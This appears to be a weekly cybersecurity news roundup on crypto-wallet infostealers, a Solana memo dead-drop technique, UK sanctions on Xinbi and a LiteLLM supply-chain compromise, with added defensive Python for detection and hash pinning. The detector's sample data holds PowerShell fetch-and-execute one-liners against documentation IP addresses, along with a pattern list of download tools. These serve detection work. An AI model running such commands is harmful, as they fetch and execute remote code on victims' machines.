Infostealer Targets 700+ Crypto Wallets, Hackers Use Solana as Dead Drop, and UK Sanctions Xinbi
Weekly cybersecurity roundup: Torg Grabber infostealer targets 728 browser-based crypto wallets, GlassWorm campaign hides C2 addresses in Solana blockchain, and the UK imposes sanctions on crypto marketplace Xinbi linked to scam compounds.
Last week brought several major cybersecurity developments: a newly discovered infostealer is targeting more than 700 browser-based crypto wallets, hackers are leveraging the Solana blockchain as a covert communication channel, and the UK government has imposed sanctions on crypto marketplace Xinbi and associated entities.
Torg Grabber: 728 Crypto Wallets and Hundreds of Extensions at Risk
Cybersecurity researchers at Gen Digital have identified a new infostealer called Torg Grabber that targets confidential data from 850 browser extensions. Among them are 728 cryptocurrency wallets — including MetaMask, Phantom, and TrustWallet — along with password managers, two-factor authentication tools, and note-taking apps.

Initial access comes via the ClickFix technique: a lure page, typically a fake error or verification prompt, copies a malicious PowerShell command to the victim's clipboard and instructs them to paste and run it, so the victim launches the loader themselves. Beyond extensions, Torg Grabber harvests data from Discord, Telegram, Steam, VPN clients, email clients, and desktop crypto applications.
The malware's capabilities extend well beyond extension data theft:
- Fingerprinting the host's hardware;
- Enumerating installed software, including checks for 24 antivirus products;
- Capturing desktop screenshots;
- Stealing files from Desktop and Documents folders;
- Executing arbitrary code on infected devices.
Since late 2025, Torg Grabber operators have transitioned to HTTPS connections via Cloudflare infrastructure and learned to bypass cookie protections in Chrome, Brave, Edge, Vivaldi, and Opera. Between December 2025 and February 2026, researchers identified 334 compiled samples, with new command-and-control servers being registered weekly.
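The ClickFix entry point leaves a recognisable trace in process telemetry: a PowerShell process spawned by the user's own shell (the Win+R Run dialog is hosted by explorer.exe) with a hidden window, an execution-policy bypass, an encoded command or a download cradle, and no script file. The Python below is an added example written for this roundup, not code from Gen Digital or from the Torg Grabber report. The indicator set, the interactive-parent list and the sample records are assumptions constructed for illustration, and the 203.0.113.0/24 addresses are documentation space, not real C2.

```python
"""ClickFix-style PowerShell launch detector (added illustration).

Scans process-creation records whose fields follow Sysmon event 1 /
Windows 4688 naming. The pattern: powershell started by an interactive
parent (the user pasted the command) with evasion switches and no script
file. Indicator set and sample records are assumptions for this example.
"""
import base64
import re

# Parents a pasted one-liner usually has: the Win+R Run dialog is hosted
# by explorer.exe; cmd and Windows Terminal cover the "open a terminal
# and paste" variant. Assumed list; tune for your environment.
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "windowsterminal.exe"}

HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
POLICY_BYPASS = re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I)
NO_PROFILE = re.compile(r"-nop(?:rofile)?\b", re.I)
DOWNLOAD_CRADLE = re.compile(
    r"\b(?:iex|invoke-expression|invoke-webrequest|iwr|downloadstring|"
    r"downloadfile|curl|wget|mshta|certutil|bitsadmin)\b", re.I)
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENCODED = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(command_line):
    """Plaintext of a -EncodedCommand value, or None if absent/invalid.
    PowerShell expects base64 over UTF-16LE text."""
    m = ENCODED.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def indicators(record):
    """Names of the suspicious traits present in one record."""
    cmd = record["command_line"]
    decoded = decode_encoded_command(cmd)
    # Look for a download cradle in the decoded payload as well.
    effective = cmd if decoded is None else cmd + " " + decoded
    found = []
    if decoded is not None:
        found.append("encoded_command")
    if HIDDEN_WINDOW.search(cmd):
        found.append("hidden_window")
    if POLICY_BYPASS.search(cmd):
        found.append("policy_bypass")
    if NO_PROFILE.search(cmd):
        found.append("no_profile")
    if DOWNLOAD_CRADLE.search(effective):
        found.append("download_cradle")
    return found


def is_clickfix_candidate(record, min_indicators=2):
    """PowerShell spawned by an interactive parent with >= min_indicators
    evasion traits. The parent check is what separates a pasted ClickFix
    command from the same one-liner run by a scheduled task or service."""
    image = record["image"].rsplit("\\", 1)[-1].lower()
    parent = record["parent_image"].rsplit("\\", 1)[-1].lower()
    if image not in {"powershell.exe", "pwsh.exe"}:
        return False
    if parent not in INTERACTIVE_PARENTS:
        return False
    return len(indicators(record)) >= min_indicators


def hunt(records):
    """Command lines of all records matching the heuristic."""
    return [r["command_line"] for r in records if is_clickfix_candidate(r)]


# Constructed sample telemetry, not real events. The encoded payload is
# built here so the block is self-contained; 203.0.113.0/24 is the
# documentation range, not a real C2.
PLAINTEXT_PAYLOAD = (
    "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/x')")
ENCODED_PAYLOAD = base64.b64encode(
    PLAINTEXT_PAYLOAD.encode("utf-16-le")).decode("ascii")
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

SAMPLE_RECORDS = [
    # User opened a console by hand: interactive parent but no evasion.
    {"image": PS, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell.exe"},
    # Pasted ClickFix one-liner with a download cradle.
    {"image": PS, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": 'powershell -w hidden -ep bypass -c "iwr http://203.0.113.5/a.ps1 | iex"'},
    # Pasted ClickFix one-liner with the cradle hidden behind -enc.
    {"image": PS, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell -nop -w hidden -enc " + ENCODED_PAYLOAD},
    # Same payload launched by a scheduled task: suspicious, but not ClickFix.
    {"image": PS, "parent_image": r"C:\Windows\System32\svchost.exe",
     "command_line": "powershell -nop -w hidden -enc " + ENCODED_PAYLOAD},
]

if __name__ == "__main__":
    for line in hunt(SAMPLE_RECORDS):
        print("ClickFix candidate:", line[:80])
```

The parent-process condition is the part worth keeping even if the switch list is swapped for your own: the same one-liner fired by svchost.exe or a scheduled task is still worth an alert, but it is a different playbook from a user who was socially engineered into pasting it.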
Why This Matters
The scale of Torg Grabber's targeting is unprecedented for an infostealer: virtually every popular browser-based crypto wallet is in its crosshairs. The GlassWorm campaign, meanwhile, shows how C2 hiding is evolving. Because the loader only reads public blockchain data, its traffic goes to ordinary Solana RPC endpoints rather than to a server defenders can sinkhole, and the operators can repoint every infected host by sending a single new transaction, which makes the infrastructure significantly harder to block or take down. The UK sanctions against Xinbi represent one of the first instances of Western regulators directly targeting crypto infrastructure that serves fraudulent operations across Southeast Asia.
GlassWorm: Solana Blockchain as a Dead Drop
Researchers at Aikido have documented a new phase of the GlassWorm campaign. Hackers distribute poisoned code packages through npm, PyPI, GitHub, and the Open VSX marketplace, while also compromising accounts of maintainers of popular projects to push malicious updates.
The key discovery is how the C2 server address is concealed. Instead of hardcoding it into the malware (where it would be easy to find and block), attackers used a "dead drop" method via the Solana blockchain. The loader connects to the network, checks predetermined wallets, and searches for transactions containing a special text memo. From this field, it extracts a disguised link to the command server.
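To make the dead drop concrete, here is an added Python example of the defender-side counterpart: a script that walks Solana transactions touching the watched wallet, pulls out the memo instructions and tries to recover a URL from each. It is not GlassWorm's loader and not code from Aikido's write-up. The transaction shape follows the `getTransaction` JSON-RPC result in `jsonParsed` encoding and the Memo program IDs are the public mainnet ones; the base64 disguise, the wallet addresses, the signatures and the memos are assumptions constructed for the example, since the page does not state the exact encoding GlassWorm uses. The same `extract_urls` step applies to any free-text dead drop, including the Google Calendar event description used by the second-stage module described later in this section.

```python
"""Solana memo dead-drop resolver (added illustration, defender side).

Given transactions that touch a watched wallet, pull every SPL Memo
instruction and try to recover a URL from it. Transaction shape follows
the `getTransaction` JSON-RPC result with `jsonParsed` encoding. The
wallets, signatures and memos below are constructed for this example.
"""
import base64
import re

# SPL Memo program IDs on mainnet (v1 and v2); public, well-known values.
MEMO_PROGRAM_IDS = {
    "Memo1UhkJRfHyvLMcVucJwxXeuD728EqVDDwQDxFMNo",
    "MemoSq4gqABAXKb96qnH8TysNcWxMyWCqXgDLGmfcHr",
}
URL_RE = re.compile(r"https?://[^\s'\"<>]+")


def memos_in_transaction(tx):
    """Yield memo strings from top-level and inner instructions."""
    message = tx["transaction"]["message"]
    groups = [message.get("instructions", [])]
    meta = tx.get("meta") or {}
    for inner in meta.get("innerInstructions") or []:
        groups.append(inner.get("instructions", []))
    for ixs in groups:
        for ix in ixs:
            is_memo = (ix.get("program") == "spl-memo"
                       or ix.get("programId") in MEMO_PROGRAM_IDS)
            if is_memo and isinstance(ix.get("parsed"), str):
                yield ix["parsed"]


def decode_candidates(memo):
    """Plaintext forms a memo might hide a link in. Assumption: the page
    does not give GlassWorm's exact disguise, so plain, reversed and
    base64 text are tried as an illustrative set."""
    text = memo.strip()
    forms = [text, text[::-1]]
    try:
        forms.append(base64.b64decode(text, validate=True).decode("utf-8"))
    except (ValueError, UnicodeDecodeError):
        pass  # not base64, or not text once decoded
    return forms


def extract_urls(memo):
    """Distinct URLs found in any candidate form of the memo."""
    urls = []
    for form in decode_candidates(memo):
        for url in URL_RE.findall(form):
            if url not in urls:
                urls.append(url)
    return urls


def involves_wallet(tx, wallets):
    """True if any account key of the transaction is a watched wallet."""
    keys = tx["transaction"]["message"].get("accountKeys", [])
    pubkeys = {k["pubkey"] if isinstance(k, dict) else k for k in keys}
    return bool(pubkeys & set(wallets))


def resolve_dead_drops(transactions, watched_wallets):
    """(signature, memo, url) for every URL hidden in memos of transactions
    that touch a watched wallet, in the order given (newest first when the
    list comes from getSignaturesForAddress)."""
    hits = []
    for tx in transactions:
        if not involves_wallet(tx, watched_wallets):
            continue
        signature = tx["transaction"]["signatures"][0]
        for memo in memos_in_transaction(tx):
            for url in extract_urls(memo):
                hits.append((signature, memo, url))
    return hits


# --- constructed sample data (not real on-chain transactions) ---
MEMO_V2 = "MemoSq4gqABAXKb96qnH8TysNcWxMyWCqXgDLGmfcHr"
WATCHED_WALLET = "ExampleDeadDropWalletNotAReal1Address11111"  # placeholder
OTHER_WALLET = "ExampleUnrelatedWalletNotReal11111111111111"  # placeholder
STAGE2_URL = "https://203.0.113.9/stage2"  # documentation range, not real C2
MEMO_B64 = base64.b64encode(STAGE2_URL.encode()).decode("ascii")


def _tx(signature, wallet, memo, inner=False):
    """Build a minimal jsonParsed-shaped transaction for the sample."""
    ix = {"program": "spl-memo", "programId": MEMO_V2, "parsed": memo}
    message = {"accountKeys": [{"pubkey": wallet, "signer": True, "writable": True},
                               {"pubkey": MEMO_V2, "signer": False, "writable": False}],
               "instructions": [] if inner else [ix]}
    meta = {"innerInstructions": [{"index": 0, "instructions": [ix]}] if inner else []}
    return {"transaction": {"signatures": [signature], "message": message}, "meta": meta}


SAMPLE_TRANSACTIONS = [
    _tx("sigExample3", WATCHED_WALLET, MEMO_B64, inner=True),    # the dead drop
    _tx("sigExample2", WATCHED_WALLET, "thanks for the coffee"),  # noise
    _tx("sigExample1", OTHER_WALLET, "https://203.0.113.50/x"),   # wrong wallet
]

if __name__ == "__main__":
    for signature, memo, url in resolve_dead_drops(SAMPLE_TRANSACTIONS, {WATCHED_WALLET}):
        print(f"{signature}: memo {memo!r} -> C2 {url}")
```

A defender who has recovered the watched addresses from a loader sample can run this against a public RPC endpoint on a schedule: each new memo that decodes to a URL is a new C2 to block and a signal that the operators have rotated. Blocking the RPC endpoint itself is rarely an option, since it is ordinary public infrastructure, which is exactly what makes the technique attractive to the attackers.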

The second stage involves compressing stolen data — crypto wallets, system profiles — into a ZIP archive and exfiltrating it to an external server. Two additional modules are then deployed:
- Hardware wallet phishing: When a USB device is connected, a fake dialog appears — for Ledger, a fabricated configuration error with 24 fields for the recovery phrase; for Trezor, a "firmware verification failure" message with an emergency reboot prompt and identical input fields.
- JavaScript RAT: Its download URL is extracted from a Google Calendar event description (another dead drop variant). The trojan launches a hidden remote desktop module, steals browser data, and force-installs the Google Docs Offline extension, which collects up to 5,000 history entries, screenshots, and clipboard contents, and monitors crypto exchanges such as Bybit by tracking authorization tokens and device IDs.
A notable detail: the malware does not infect systems with Russian localization.
UK Sanctions Target Xinbi and Scam Compounds
On March 26, 2026, the UK government imposed sanctions on crypto marketplace Xinbi and individuals connected to scam compounds in Southeast Asia. Authorities stated the platform facilitated the sale of stolen personal data and provided tools for targeting victims, including satellite internet equipment.
Sanctions also hit Legend Innovation, operator of #8Park — a major scam compound in Cambodia estimated to hold up to 20,000 forced laborers. Restrictions were placed on company director Eang Soklim and individuals linked to the Prince Group financial network.
According to Chainalysis, Xinbi processed transactions exceeding $19.9 billion between 2021 and 2025.
In India, authorities arrested Sunil Nellat Ramakrishnan (also known as Krish), suspected of trafficking citizens to fraudulent crypto centers in Myanmar. Victims were transported from Delhi to Bangkok under the pretense of legitimate employment, then forcibly moved to the Myawaddy area, specifically to the KK Park compound.
Cyberattack on Ignition Interlock Maker Locks Drivers Out of Cars
Intoxalock, a US-based provider of ignition interlock systems for drivers convicted of DUI offenses, suffered a cyberattack that disrupted device operations. Because the devices must be calibrated monthly and the attack made that verification impossible, some users were unable to start their vehicles.
In Connecticut alone, the issue affected 7–10% of users. Intoxalock extended service center authorization by 10 days, though the extension didn't work for all device versions or in every state. Systems were restored on March 22, and the company pledged to reimburse affected users, including towing expenses.
Trojan Discovered in AI Tool LiteLLM
Researcher Callum McMahon of FutureSearch discovered credential-stealing malware embedded in LiteLLM, a popular Python library and proxy that gives developers a single interface to hundreds of LLM providers, with spend tracking and budgets. The project has over 40,000 GitHub stars and up to 3.4 million daily downloads.
The malware infiltrated through a compromised third-party dependency package. McMahon suspected infection when his computer shut down immediately after loading the software: a bug in the malware itself triggered a system crash, inadvertently revealing its presence. McMahon and developer Andrej Karpathy concluded the malware was likely created using vibe coding without careful review.
"Oh damn, I thought this WAS a joke… but no, LiteLLM *really* was 'Secured by Delve' (the company that rubber stamped all of these audits, and seems to have been on the edge of fraudulent auditing, but useless for sure). And so unsurprisingly LiteLLM was compromised, badly" — Gergely Orosz (@GergelyOrosz), original post
LiteLLM's website displays SOC2 and ISO 27001 certification badges issued after an audit by Delve, a company previously accused of generating fake data for reports, using questionable auditors, and misleading clients about their security posture. LiteLLM's developers managed to eliminate the threat within hours. An investigation is underway in collaboration with Mandiant.
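The LiteLLM incident is a textbook case of a dependency being swapped under a project that trusted its package index. The control that catches a replaced artifact is hash pinning: record the sha256 of every reviewed artifact in the lock file and refuse to install anything else. The Python below is an added example illustrating the logic that `pip install --require-hashes` enforces; it is not LiteLLM's code and not the response the project used. The lock-file fragment, the package names and the wheel bytes are constructed stand-ins.

```python
"""Hash-pinned dependency verification (added illustration).

Mirrors the check `pip install --require-hashes` performs: an artifact is
accepted only if its name, version and sha256 match a reviewed lock file.
The lock-file fragment, package names and wheel bytes are constructed
stand-ins, not LiteLLM's dependencies.
"""
import hashlib
import re

REQ_LINE = re.compile(r"^(?P<name>[A-Za-z0-9_.-]+)==(?P<version>[^\s\\]+)(?P<rest>.*)$")
HASH_OPT = re.compile(r"--hash=sha256:([0-9a-f]{64})")


def parse_requirements(text):
    """Parse pip-compile style output: `name==version` followed by one or
    more `--hash=sha256:...` options, with backslash line continuations."""
    reqs = {}
    for raw in text.replace("\\\n", " ").splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        m = REQ_LINE.match(line)
        if not m:
            raise ValueError(f"unsupported requirement line: {line!r}")
        reqs[m["name"].lower()] = {
            "version": m["version"],
            "hashes": set(HASH_OPT.findall(m["rest"])),
        }
    return reqs


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def verify_artifact(reqs, name, version, data):
    """(ok, reason) for a downloaded artifact against the lock file.
    Every failure mode is a distinct reason so an installer log shows
    which control tripped."""
    req = reqs.get(name.lower())
    if req is None:
        return False, "not in lock file: an unreviewed dependency"
    if req["version"] != version:
        return False, f"version {version} differs from pinned {req['version']}"
    if not req["hashes"]:
        return False, "pinned without --hash: a replaced artifact would pass"
    if sha256_hex(data) not in req["hashes"]:
        return False, "sha256 mismatch: artifact differs from the reviewed one"
    return True, "ok"


def audit_unpinned(reqs):
    """Names pinned by version only; a swapped artifact of that version
    would be installed without complaint."""
    return sorted(n for n, r in reqs.items() if not r["hashes"])


# --- constructed sample (not real packages or real wheel contents) ---
GOOD_WHEEL = b"PK\x03\x04 stand-in bytes for the wheel reviewed at pin time"
TAMPERED_WHEEL = GOOD_WHEEL + b"\n# stand-in for an injected credential stealer"
LOCK_FILE = f"""\
# constructed lock file; names are placeholders
example-dep==1.2.3 \\
    --hash=sha256:{sha256_hex(GOOD_WHEEL)}
unpinned-dep==0.9.0
"""

if __name__ == "__main__":
    reqs = parse_requirements(LOCK_FILE)
    print(verify_artifact(reqs, "example-dep", "1.2.3", GOOD_WHEEL))
    print(verify_artifact(reqs, "example-dep", "1.2.3", TAMPERED_WHEEL))
    print("unpinned:", audit_unpinned(reqs))
```

In practice this is `pip install --require-hashes -r requirements.txt` with a lock file produced by `pip-compile --generate-hashes`. The limitation is visible in the code: a hash pin only proves the artifact is the one reviewed at pin time, so it blocks a silently replaced package or an unreviewed transitive upgrade, not a backdoor that was already present in the version that got pinned.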
Frequently Asked Questions
What is Torg Grabber infostealer and which wallets does it target?
Torg Grabber is a newly discovered infostealer identified by Gen Digital researchers that targets 728 browser-based crypto wallets including MetaMask, Phantom, and TrustWallet. It also attacks password managers, 2FA apps, and harvests data from Discord, Telegram, and other services.
How are hackers using Solana blockchain for cyberattacks?
In the GlassWorm campaign, hackers hide their command-and-control server address in the memo field of Solana transactions — a technique known as a 'dead drop.' The malware loader checks predetermined wallets, extracts the disguised link from the transaction memo, and connects to the attackers' server.
Why did the UK impose sanctions on Xinbi?
On March 26, 2026, the UK government sanctioned crypto marketplace Xinbi for facilitating the sale of stolen personal data and providing tools for targeting fraud victims. According to Chainalysis, Xinbi processed over $19.9 billion in transactions between 2021 and 2025.
What happened with the LiteLLM malware incident?
Researcher Callum McMahon of FutureSearch discovered credential-stealing malware in LiteLLM, a popular AI tool with up to 3.4 million daily downloads. The malware entered through a compromised third-party dependency. A bug in the malware itself caused a system crash, which revealed its presence.
How did the Intoxalock cyberattack affect drivers?
The attack on Intoxalock's servers prevented mandatory calibration of ignition interlock devices, locking some drivers out of their vehicles. In Connecticut alone, 7–10% of users were affected. Systems were restored on March 22, and the company promised to reimburse expenses including towing costs.
